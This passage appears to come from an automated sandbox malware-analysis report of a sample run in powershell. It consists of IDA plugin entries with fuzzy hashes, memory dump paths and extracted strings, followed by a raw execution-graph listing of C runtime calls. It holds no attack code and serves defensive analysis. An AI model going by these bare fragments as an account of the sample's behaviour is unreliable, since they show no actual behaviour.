                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd28d71e9d14d71f2816d0d7e3a13d0a98352c60132eaa761ac59ddc3bdb41fb
                                                                                                                • Instruction ID: 0e94b4cafe4072358085b2776c8bf879da8edc687b964f747b4c1d020346343f
                                                                                                                • Opcode Fuzzy Hash: cd28d71e9d14d71f2816d0d7e3a13d0a98352c60132eaa761ac59ddc3bdb41fb
                                                                                                                • Instruction Fuzzy Hash: 12313E34A051288FCF25DB64C850AEEB7B2BF89304F1444EAD50AAB351CB359E85CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9d87f117b62ae7f1c4601483f1381e7c9a6b5de2624c6440208e6e8cebe4c1f
                                                                                                                • Instruction ID: e2cddecffb40a9930bf25b3e580b2f4f59a316f92fe83e95b1bca8c57d2d813e
                                                                                                                • Opcode Fuzzy Hash: b9d87f117b62ae7f1c4601483f1381e7c9a6b5de2624c6440208e6e8cebe4c1f
                                                                                                                • Instruction Fuzzy Hash: 97317E34A012589FCF14DFA4D580AADB7F7AF89744F14906AE402EB3A0CB31AD46DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 101bc2deade9ca14b1b21935d2479e0089e58edc5bf8ce9e0e8db20dae998082
                                                                                                                • Instruction ID: bf5188e173fe1cf1d8ca098c65fcbd508f5f62fab66630916dad29a62254fea7
                                                                                                                • Opcode Fuzzy Hash: 101bc2deade9ca14b1b21935d2479e0089e58edc5bf8ce9e0e8db20dae998082
                                                                                                                • Instruction Fuzzy Hash: 95318D74B002049FCB14DF28D888BAD7BF6EF8A715F190068E506EB7A1CB71AC45CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 679fb1c472db8a6afc92285ca8d2cec9fe9a5dc9676f2d223e2bce17960946bf
                                                                                                                • Instruction ID: aafe62f01d700c0c719171bcdeb58eead4d77bae98301fc6321f4d22b4ce2299
                                                                                                                • Opcode Fuzzy Hash: 679fb1c472db8a6afc92285ca8d2cec9fe9a5dc9676f2d223e2bce17960946bf
                                                                                                                • Instruction Fuzzy Hash: 3D211678A006059FCB04CF99C590DAAFBF5FF49320B1585A9E909DB755C732EC82CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b3e5c1d40a911b0e0949f9964d2382208ea4a7980a6441cffa77f6278118a239
                                                                                                                • Instruction ID: 2b1620f33e500e87517effc29a8312ef1ebb0c352dc1a7c516500fc1afc5a9fd
                                                                                                                • Opcode Fuzzy Hash: b3e5c1d40a911b0e0949f9964d2382208ea4a7980a6441cffa77f6278118a239
                                                                                                                • Instruction Fuzzy Hash: 76217C74A042499FCB05DF9CD9909AABBB5FF89310B14809AE849AB352C730FC41CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ac72b7eb3d09ef29d0ab9a9644f86eba1a7dd9c681b96d01e22644faa06e27e6
                                                                                                                • Instruction ID: d342b05bec003423ac87790f87c13f7054a717563b945109c3356ed91e56bc0a
                                                                                                                • Opcode Fuzzy Hash: ac72b7eb3d09ef29d0ab9a9644f86eba1a7dd9c681b96d01e22644faa06e27e6
                                                                                                                • Instruction Fuzzy Hash: D21190352093C08FCB16DB24D864A517FB0AF8365571A40DFE189CF273C226DC4AD711
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a5ebb1664892bf9bf10724a47af5a26f7e8a83cdbcecca882924415f51826c2
                                                                                                                • Instruction ID: 34110b261050afbc704d56d119a6804094c495a7733ef9dbbec03109306e784c
                                                                                                                • Opcode Fuzzy Hash: 3a5ebb1664892bf9bf10724a47af5a26f7e8a83cdbcecca882924415f51826c2
                                                                                                                • Instruction Fuzzy Hash: 99215BB4A042599FCB04CF9CC9809AABBF5FF89300B158096E919EB352C735FD41CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c6ca089636dc0b9a8346e64c76766223bdb65c0bf3ed5247173b506eeade13bb
                                                                                                                • Instruction ID: 9c3f72ef71466cb0d6d16ff10846bbb2875849ae7875ff657a09de27d474a37b
                                                                                                                • Opcode Fuzzy Hash: c6ca089636dc0b9a8346e64c76766223bdb65c0bf3ed5247173b506eeade13bb
                                                                                                                • Instruction Fuzzy Hash: 8B11B1B02893829FD7268768C9546A1BFA1EF87214B1DC5DFD0848F1A3CB269C87C752
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8cd986d091222786a2811546aa9226b825f5a9a64a770a31a69d0327db9e46aa
                                                                                                                • Instruction ID: 1803745eca4cf7905d4805afe1d64a93645d7ceb8ee8e71632846ffe2368f5a8
                                                                                                                • Opcode Fuzzy Hash: 8cd986d091222786a2811546aa9226b825f5a9a64a770a31a69d0327db9e46aa
                                                                                                                • Instruction Fuzzy Hash: F8119D352083408FDB16CB68D408B597FB5AF86619F0980EAE008CB263C776D84BD761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae611b914e10e74bc85e212ad901dfc6fddf759c9688870603b534c1607212ab
                                                                                                                • Instruction ID: 86ad8de3f4d0e9256aa00de01ba39ce52a85df7b88935424e611462bff01266b
                                                                                                                • Opcode Fuzzy Hash: ae611b914e10e74bc85e212ad901dfc6fddf759c9688870603b534c1607212ab
                                                                                                                • Instruction Fuzzy Hash: DE01B9366053408FC725CB65C414E66BBF6EF86219F0984AEE4598B751C735EC85C750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4b86d9abad6dbfd104fcf43333e914086bb9639ab07cf2c6941051a9bd0e7f14
                                                                                                                • Instruction ID: 6a910eef8b74d4e994cf3d06b92c5565aacce2bf1ce54df4f87ba79c61b95a81
                                                                                                                • Opcode Fuzzy Hash: 4b86d9abad6dbfd104fcf43333e914086bb9639ab07cf2c6941051a9bd0e7f14
                                                                                                                • Instruction Fuzzy Hash: EA01F674A0420ACFC784DFA8D485DAABFF0BF09210F504299E506EB722D731EA84CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-267665775
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2309685269
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-1910532044
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-1480752206
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2702571027
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2705583504
                                                                                                                • Opcode ID: c05a73b36340ff3edad96a87a39d94b5f652a54e7d46d49f5754c738cc31a554
                                                                                                                • Instruction ID: 07841872c62e9d2bf246ac34b95e6b2362b66fb748edce7b0543556fc26da755
                                                                                                                • Opcode Fuzzy Hash: c05a73b36340ff3edad96a87a39d94b5f652a54e7d46d49f5754c738cc31a554
                                                                                                                • Instruction Fuzzy Hash: 62218EF5A20206DBDB368E1DC584AE577A6BF41662F694467F8098B150F731CCA0CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 84i$84i$tP]q$tP]q
                                                                                                                • API String ID: 0-1380357753
                                                                                                                • Opcode ID: 56fa25025cf0e05360983dc3f8042a2abbeab8d2937cf1e3658e5c97552150bb
                                                                                                                • Instruction ID: d7d3fd2e467dd7c246bcb65624e68cdfef97cd1453ca1d65b0b23d7bebefbdaf
                                                                                                                • Opcode Fuzzy Hash: 56fa25025cf0e05360983dc3f8042a2abbeab8d2937cf1e3658e5c97552150bb
                                                                                                                • Instruction Fuzzy Hash: A2317BB1A042659FC7315B6C98246E9BFE1EF46750F19849BD980DF392C6309C06C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-858218434
                                                                                                                • Opcode ID: e4f0034c65335bd9a18df69a37f035e64edf365b99752a447bdf7cfd9779b47d
                                                                                                                • Instruction ID: ab9ef5b886baec536764ce3fafda8296b642ec6d3a8ee0b473d25f0361dc8305
                                                                                                                • Opcode Fuzzy Hash: e4f0034c65335bd9a18df69a37f035e64edf365b99752a447bdf7cfd9779b47d
                                                                                                                • Instruction Fuzzy Hash: FC3138717103129BEA38562D8960B7A77CAABC0A54F70883BEE41DF3C1ED66DD1183B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-858218434
                                                                                                                • Opcode ID: 1de1a855853eb9d86f77a48f2ec0d7572b68a6ef4a12f51d93504df885e2085e
                                                                                                                • Instruction ID: 849a7c9a3c6ca48618ff11d60079b20dd560f6e82394b9d0446d412a5e5618d2
                                                                                                                • Opcode Fuzzy Hash: 1de1a855853eb9d86f77a48f2ec0d7572b68a6ef4a12f51d93504df885e2085e
                                                                                                                • Instruction Fuzzy Hash: C12136713003159BDB74662D9860777BBD5BBC0611F24882B990DCB3C1DD71DC418361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                • API String ID: 0-978391646
                                                                                                                • Opcode ID: 69f54171575a6e0725fc8b4a575004ffd166183e9d1a0a13ccd52a083ae6d2c1
                                                                                                                • Instruction ID: c6d821bb12f0b42443e04444ee2b427bb8652dd0df16d6942ae1aa6695eecd42
                                                                                                                • Opcode Fuzzy Hash: 69f54171575a6e0725fc8b4a575004ffd166183e9d1a0a13ccd52a083ae6d2c1
                                                                                                                • Instruction Fuzzy Hash: D901F232B097898FC33A423C28201B12FF69FC399032B04D3C481DF267CA294C0A83A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.6%
                                                                                                                Dynamic/Decrypted Code Coverage:99.7%
                                                                                                                Signature Coverage:3.5%
                                                                                                                Total number of Nodes:1591
                                                                                                                Total number of Limit Nodes:5
6293 22c95e47 TlsGetValue 6292->6293 6296 22c95e3b 6292->6296 6293->6296 6294 22c92ada _ValidateLocalCookies 5 API calls 6295 22c95e58 6294->6295 6295->6272 6296->6294 6302 22c96388 _abort 6297->6302 6298 22c963c8 6301 22c96368 __dosmaperr 19 API calls 6298->6301 6299 22c963b3 RtlAllocateHeap 6300 22c95bab 6299->6300 6299->6302 6300->6277 6310 22c95e5e 6300->6310 6301->6300 6302->6298 6302->6299 6303 22c9474f _abort 7 API calls 6302->6303 6303->6302 6305 22c95729 HeapFree 6304->6305 6306 22c95752 __dosmaperr 6304->6306 6305->6306 6307 22c9573e 6305->6307 6306->6283 6308 22c96368 __dosmaperr 18 API calls 6307->6308 6309 22c95744 GetLastError 6308->6309 6309->6306 6311 22c95c45 _abort 5 API calls 6310->6311 6312 22c95e85 6311->6312 6313 22c95ea0 TlsSetValue 6312->6313 6314 22c95e94 6312->6314 6313->6314 6315 22c92ada _ValidateLocalCookies 5 API calls 6314->6315 6316 22c95bc8 6315->6316 6316->6277 6316->6284 6328 22c95914 6317->6328 6325 22c95c71 6322->6325 6327 22c95c75 __crt_fast_encode_pointer 6322->6327 6323 22c95c95 6326 22c95ca1 GetProcAddress 6323->6326 6323->6327 6324 22c95ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6324->6325 6325->6323 6325->6324 6325->6327 6326->6327 6327->6292 6329 22c95854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6328->6329 6330 22c95938 6329->6330 6331 22c958c4 6330->6331 6332 22c95758 _abort 20 API calls 6331->6332 6333 22c958e8 6332->6333 6333->6288 6335 22c91ca6 _strlen 6334->6335 6335->6230 6372 22c920db 6375 22c920e7 ___scrt_is_nonwritable_in_current_image 6372->6375 6373 22c920f6 6374 22c92110 dllmain_raw 6374->6373 6376 22c9212a 6374->6376 6375->6373 6375->6374 6378 22c9210b 6375->6378 6385 22c91eec 6376->6385 6378->6373 6379 22c92177 6378->6379 6382 22c91eec 31 API calls 6378->6382 6379->6373 6380 22c91eec 31 API calls 6379->6380 6381 22c9218a 6380->6381 6381->6373 6383 22c92193 dllmain_raw 6381->6383 6384 22c9216d dllmain_raw 6382->6384 6383->6373 6384->6379 6386 22c91f2a 
dllmain_crt_process_detach 6385->6386 6387 22c91ef7 6385->6387 6394 22c91f06 6386->6394 6388 22c91f1c dllmain_crt_process_attach 6387->6388 6389 22c91efc 6387->6389 6388->6394 6390 22c91f01 6389->6390 6391 22c91f12 6389->6391 6390->6394 6395 22c9240b 6390->6395 6400 22c923ec 6391->6400 6394->6378 6408 22c953e5 6395->6408 6547 22c93513 6400->6547 6403 22c923f5 6403->6394 6406 22c92408 6406->6394 6407 22c9351e 7 API calls 6407->6403 6414 22c95aca 6408->6414 6411 22c9351e 6518 22c93820 6411->6518 6413 22c92415 6413->6394 6415 22c95ad4 6414->6415 6418 22c92410 6414->6418 6416 22c95e08 _abort 11 API calls 6415->6416 6417 22c95adb 6416->6417 6417->6418 6419 22c95e5e _abort 11 API calls 6417->6419 6418->6411 6420 22c95aee 6419->6420 6422 22c959b5 6420->6422 6423 22c959c0 6422->6423 6424 22c959d0 6422->6424 6428 22c959d6 6423->6428 6424->6418 6427 22c9571e _free 20 API calls 6427->6424 6429 22c959e9 6428->6429 6430 22c959ef 6428->6430 6432 22c9571e _free 20 API calls 6429->6432 6431 22c9571e _free 20 API calls 6430->6431 6433 22c959fb 6431->6433 6432->6430 6434 22c9571e _free 20 API calls 6433->6434 6435 22c95a06 6434->6435 6436 22c9571e _free 20 API calls 6435->6436 6437 22c95a11 6436->6437 6438 22c9571e _free 20 API calls 6437->6438 6439 22c95a1c 6438->6439 6440 22c9571e _free 20 API calls 6439->6440 6441 22c95a27 6440->6441 6442 22c9571e _free 20 API calls 6441->6442 6443 22c95a32 6442->6443 6444 22c9571e _free 20 API calls 6443->6444 6445 22c95a3d 6444->6445 6446 22c9571e _free 20 API calls 6445->6446 6447 22c95a48 6446->6447 6448 22c9571e _free 20 API calls 6447->6448 6449 22c95a56 6448->6449 6454 22c9589c 6449->6454 6460 22c957a8 6454->6460 6456 22c958c0 6457 22c958ec 6456->6457 6473 22c95809 6457->6473 6459 22c95910 6459->6427 6461 22c957b4 ___scrt_is_nonwritable_in_current_image 6460->6461 6468 22c95671 RtlEnterCriticalSection 6461->6468 6463 22c957e8 6469 22c957fd 6463->6469 6464 22c957be 6464->6463 6467 22c9571e _free 20 API calls 6464->6467 6466 22c957f5 _abort 
6466->6456 6467->6463 6468->6464 6472 22c956b9 RtlLeaveCriticalSection 6469->6472 6471 22c95807 6471->6466 6472->6471 6474 22c95815 ___scrt_is_nonwritable_in_current_image 6473->6474 6481 22c95671 RtlEnterCriticalSection 6474->6481 6476 22c9581f 6482 22c95a7f 6476->6482 6478 22c95832 6486 22c95848 6478->6486 6480 22c95840 _abort 6480->6459 6481->6476 6483 22c95ab5 __fassign 6482->6483 6484 22c95a8e __fassign 6482->6484 6483->6478 6484->6483 6489 22c97cc2 6484->6489 6517 22c956b9 RtlLeaveCriticalSection 6486->6517 6488 22c95852 6488->6480 6490 22c97d42 6489->6490 6493 22c97cd8 6489->6493 6492 22c9571e _free 20 API calls 6490->6492 6516 22c97d90 6490->6516 6491 22c97e35 __fassign 20 API calls 6496 22c97d9e 6491->6496 6494 22c97d64 6492->6494 6493->6490 6497 22c9571e _free 20 API calls 6493->6497 6498 22c97d0b 6493->6498 6495 22c9571e _free 20 API calls 6494->6495 6499 22c97d77 6495->6499 6501 22c97dfe 6496->6501 6514 22c9571e 20 API calls _free 6496->6514 6502 22c97d00 6497->6502 6503 22c9571e _free 20 API calls 6498->6503 6515 22c97d2d 6498->6515 6504 22c9571e _free 20 API calls 6499->6504 6500 22c9571e _free 20 API calls 6505 22c97d37 6500->6505 6507 22c9571e _free 20 API calls 6501->6507 6508 22c990ba ___free_lconv_mon 20 API calls 6502->6508 6509 22c97d22 6503->6509 6510 22c97d85 6504->6510 6506 22c9571e _free 20 API calls 6505->6506 6506->6490 6511 22c97e04 6507->6511 6508->6498 6512 22c991b8 __fassign 20 API calls 6509->6512 6513 22c9571e _free 20 API calls 6510->6513 6511->6483 6512->6515 6513->6516 6514->6496 6515->6500 6516->6491 6517->6488 6519 22c9382d 6518->6519 6520 22c9384b ___vcrt_freefls@4 6518->6520 6521 22c9383b 6519->6521 6524 22c93b67 6519->6524 6520->6413 6529 22c93ba2 6521->6529 6534 22c93a82 6524->6534 6526 22c93b81 6527 22c93b99 TlsGetValue 6526->6527 6528 22c93b8d 6526->6528 6527->6528 6528->6521 6530 22c93a82 try_get_function 5 API calls 6529->6530 6531 22c93bbc 6530->6531 6532 22c93bd7 TlsSetValue 6531->6532 6533 22c93bcb 6531->6533 
